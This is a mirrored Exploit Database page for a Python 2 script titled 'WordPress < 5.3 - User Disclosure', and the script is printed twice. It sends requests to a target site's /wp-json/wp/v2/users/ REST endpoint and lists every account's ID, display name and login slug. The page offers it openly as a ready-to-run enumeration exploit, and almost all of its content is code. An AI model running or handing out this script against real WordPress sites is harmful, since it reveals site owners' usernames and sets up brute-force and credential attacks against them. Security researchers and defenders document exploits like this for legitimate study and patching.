WordPress Core 5.3 – User Disclosure

Exploit Database
133 阅读

作者： SajjadBnd

日期： 2019-11-28
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47720/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

# Exploit Title : WordPress 5.3 - User Disclosure

# Author: SajjadBnd

# Date: 2019-11-17

# Software Link: https://wordpress.org/download/

# version : wp < 5.3

# tested on : Ubunutu 18.04 / python 2.7

# CVE: N/A

#!/usr/bin/python

# -*- coding: utf-8 -*-

#

import requests

import os

import re

import json

import sys

import urllib3

def clear():

linux = 'clear'

windows = 'cls'

os.system([linux, windows][os.name == 'nt'])

def Banner():

print('''

- WordPress < 5.3 - User Enumeration

- SajjadBnd

''')

def Desc():

url = raw_input('[!] Url >> ')

vuln = url + "/wp-json/wp/v2/users/"

while True:

try:

r = requests.get(vuln,verify=False)

content = json.loads(r.text)

data(content)

except requests.exceptions.MissingSchema:

vuln = "http://" + vuln

def data(content):

for x in content:

name = x["name"].encode('UTF-8')

print("======================")

print("[+] ID : " + str(x["id"]))

print("[+] Name : " + name)

print("[+] User : " + x["slug"])

sys.exit(1)

if __name__ == '__main__':

urllib3.disable_warnings()

reload(sys)

sys.setdefaultencoding('UTF8')

clear()

Banner()

Desc()

wpuser.txt

#!/usr/bin/python

# -*- coding: utf-8 -*-

#

# Exploit Title : WordPress < 5.3 - User Disclosure

# Exploit Author: SajjadBnd

# email : blackwolf@post.com

# Software Link: https://wordpress.org/download/

# version : wp < 5.3

# tested on : Ubunutu 18.04 / python 2.7

import requests

import os

import re

import json

import sys

import urllib3

def clear():

linux = 'clear'

windows = 'cls'

os.system([linux, windows][os.name == 'nt'])

def Banner():

print('''

- WordPress < 5.3 - User Enumeration

- SajjadBnd

''')

def Desc():

url = raw_input('[!] Url >> ')

vuln = url + "/wp-json/wp/v2/users/"

while True:

try:

r = requests.get(vuln,verify=False)

content = json.loads(r.text)

data(content)

except requests.exceptions.MissingSchema:

vuln = "http://" + vuln

def data(content):

for x in content:

name = x["name"].encode('UTF-8')

print("======================")

print("[+] ID : " + str(x["id"]))

print("[+] Name : " + name)

print("[+] User : " + x["slug"])

sys.exit(1)

if __name__ == '__main__':

urllib3.disable_warnings()

reload(sys)

sys.setdefaultencoding('UTF8')

clear()

Banner()

Desc()